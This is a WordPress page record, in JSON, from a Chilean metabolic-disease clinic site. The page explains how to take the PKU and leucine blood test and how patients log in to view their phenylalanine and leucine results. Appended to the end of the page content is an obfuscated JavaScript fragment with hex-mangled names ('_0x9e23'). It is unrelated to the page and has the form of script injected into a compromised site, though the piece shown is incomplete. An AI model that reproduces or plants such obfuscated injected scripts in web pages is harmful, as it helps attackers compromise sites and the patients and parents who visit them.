{"id":492,"date":"2022-03-14T21:40:10","date_gmt":"2022-03-15T01:40:10","guid":{"rendered":"https:\/\/metabolicaschile.cl\/new-site\/?page_id=492"},"modified":"2022-06-06T21:01:19","modified_gmt":"2022-06-07T01:01:19","slug":"pku-movil","status":"publish","type":"page","link":"https:\/\/metabolicaschile.cl\/new-site\/pku-movil\/","title":{"rendered":"Resultados PKU y Leucina"},"content":{"rendered":"\n<div class=\"wp-block-themeisle-blocks-advanced-columns has-1-columns has-desktop-equal-layout has-tablet-equal-layout has-mobile-equal-layout has-default-gap has-vertical-unset\" id=\"wp-block-themeisle-blocks-advanced-columns-98beea1d\"><div class=\"wp-block-themeisle-blocks-advanced-columns-overlay\"><\/div><div class=\"innerblocks-wrap\">\n<div class=\"wp-block-themeisle-blocks-advanced-column\" id=\"wp-block-themeisle-blocks-advanced-column-8859d270\">\n<h2>C\u00f3mo tomar correctamente el Examen<\/h2>\n\n\n\n<figure class=\"wp-block-video\"><video controls src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/02\/toma-muestra-eim-31-agosto_aHJdJXDf.mp4\"><\/video><\/figure>\n\n\n\n<h3>Indicaci\u00f3n Examen PKU y Leucina<\/h3>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-33a52b21-f105-4109-a2c3-a6e8bf6233e3\" href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/05\/Indicaciones-Examen-PKU-y-Leucina.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">Indicaciones-Examen-PKU-y-Leucina<\/a><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/05\/Indicaciones-Examen-PKU-y-Leucina.pdf\" class=\"wp-block-file__button\" download aria-describedby=\"wp-block-file--media-33a52b21-f105-4109-a2c3-a6e8bf6233e3\">Descarga<\/a><\/div>\n\n\n\n<h2>Consideraciones generales para el examen<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" width=\"724\" height=\"1024\" src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/05\/INFORMACION-PARA-PADRES-724x1024.png\" alt=\"\" class=\"wp-image-849\" srcset=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/05\/INFORMACION-PARA-PADRES-724x1024.png 724w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/05\/INFORMACION-PARA-PADRES-212x300.png 212w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/05\/INFORMACION-PARA-PADRES-768x1086.png 768w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/05\/INFORMACION-PARA-PADRES-1086x1536.png 1086w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/05\/INFORMACION-PARA-PADRES.png 1414w\" sizes=\"(max-width: 724px) 100vw, 724px\" \/><\/figure>\n\n\n\n<h2>Revisa los resultados de ex\u00e1menes<\/h2>\n\n\n\n<p class=\"text-justify\">En el siguiente enlace encontrar\u00e1s los resultados de los niveles de Fenilalanina y Leucina en sangre, primero debes dirigirte a: <\/p>\n\n\n<div class=\"wp-block-image style-button-shadow is-style-rounded\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/www.metabolicaschile.cl\/pku_movil\/\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" width=\"256\" height=\"256\" src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/03\/cropped-stethoscope.png\" alt=\"\" class=\"wp-image-495\" srcset=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/03\/cropped-stethoscope.png 256w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/03\/cropped-stethoscope-150x150.png 150w\" sizes=\"(max-width: 256px) 100vw, 256px\" \/><\/a><figcaption><a href=\"https:\/\/www.metabolicaschile.cl\/pku_movil\/\" target=\"_blank\" rel=\"noreferrer noopener\">PKU CONSULTA<\/a><\/figcaption><\/figure><\/div><\/div>\n<\/div><\/div>\n\n\n\n<p class=\"has-text-align-center\">INSTRUCTIVO<\/p>\n\n\n<div id=\"sp-ea-926\" class=\"sp-ea-one sp-easy-accordion\" data-ex-icon=\"fa-minus\" data-col-icon=\"fa-plus\"  data-ea-active=\"ea-click\"  data-ea-mode=\"vertical\" data-preloader=\"\"><div class=\"ea-card ea-expand sp-ea-single\"><h3 class=\"ea-header\"><a class=\"collapsed\" data-sptoggle=\"spcollapse\" data-sptarget=#collapse9260 href=\"javascript:void(0)\" aria-expanded=\"true\"><i class=\"ea-expand-icon fa fa-minus\"><\/i> Debes tener tu usuario y contrase\u00f1a<\/a><\/h3><div class=\"sp-collapse spcollapse collapsed show\" id=\"collapse9260\" data-parent=#sp-ea-926><div class=\"ea-body\"><p><span>Debes tener tu usuario y contrase\u00f1a, si no lo tienes a\u00fan, debes solicitar el acceso v\u00eda correo a\u00a0<\/span><a href=\"mailto:felipe.penaloza@inta.uchile.cl\">felipe.penaloza@inta.uchile.cl<\/a><span>\u00a0\u00f3 contactando telef\u00f3nicamente con oficina Nutrici\u00f3n; 229781529.<\/span><\/p>\n<p><img src=\"https:\/\/lh3.googleusercontent.com\/3FoYe8zGjFRf93bQw471-rQuGSzT-hOScl1M8zjNeZXR_UDIDW4wiuh0YJI4gcTXAD71cWXQavBwq50o6Tx6YAgxxH94Tejnn_ekEtx2a7omAtk7kxctXJELZ_0EzQ89Y_ulcFf-\" \/><\/p>\n<\/div><\/div><\/div><div class=\"ea-card  sp-ea-single\"><h3 class=\"ea-header\"><a class=\"collapsed\" data-sptoggle=\"spcollapse\" data-sptarget=#collapse9261 href=\"javascript:void(0)\" aria-expanded=\"false\"><i class=\"ea-expand-icon fa fa-plus\"><\/i> Una vez adentro<\/a><\/h3><div class=\"sp-collapse spcollapse \" id=\"collapse9261\" data-parent=#sp-ea-926><div class=\"ea-body\"><p><span>Una vez dentro de la plataforma debes dirigirte a \u201chistorial\u201d<\/span><\/p>\n<p><img src=\"https:\/\/lh5.googleusercontent.com\/Q5TRjzK75TpqGL___HsUee51MXn2NnHleWZkioqHHL1DFmra7I2m3bCl8wgqICHp7ZV4gAZq9HLY1pnAx-WOQwNd8G4TGvNTAUwQRCSMWMlCP1or340P2_nrTX_mDgJDAWAvQEZ5\" \/><\/p>\n<\/div><\/div><\/div><div class=\"ea-card  sp-ea-single\"><h3 class=\"ea-header\"><a class=\"collapsed\" data-sptoggle=\"spcollapse\" data-sptarget=#collapse9262 href=\"javascript:void(0)\" aria-expanded=\"false\"><i class=\"ea-expand-icon fa fa-plus\"><\/i> Resultados<\/a><\/h3><div class=\"sp-collapse spcollapse \" id=\"collapse9262\" data-parent=#sp-ea-926><div class=\"ea-body\"><p><span>Y Listo \u00a1 ya puedes revisar tus niveles de PKU\/Leucina:<\/span><\/p>\n<p><img src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/03\/screenshot-docs.google.com-2022.03.14-22_47_15.png\" \/><\/p>\n<\/div><\/div><\/div><\/div>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script>","protected":false},"excerpt":{"rendered":"<p>INSTRUCTIVO<\/p>\n","protected":false},"author":1,"featured_media":759,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/492"}],"collection":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/comments?post=492"}],"version-history":[{"count":13,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/492\/revisions"}],"predecessor-version":[{"id":929,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/492\/revisions\/929"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/media\/759"}],"wp:attachment":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/media?parent=492"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}